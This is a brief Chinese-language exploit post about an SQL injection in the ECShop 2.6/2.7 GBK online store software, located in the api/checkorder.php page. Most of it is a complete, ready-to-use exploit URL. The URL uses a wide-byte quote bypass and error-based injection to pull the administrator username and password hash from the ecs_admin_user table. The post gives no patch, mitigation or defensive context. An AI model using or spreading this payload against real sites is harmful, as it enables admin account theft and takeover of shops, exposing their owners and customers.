ecshop 注入通杀2.6*2.7 GBK版本

[ecshop 注入通杀2.6*2.7 GBK版本 全文]
影响版本：通杀2.6*2.7
官方地址：Ecshop.cn

漏洞类型：注入漏洞
漏洞描述：Ecshop网上商城程序2.6/2.7Xapi/checkorder.php页面参数过滤不严导致SQL注入暴管理员用户密码漏洞。

 

注入Exp:http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
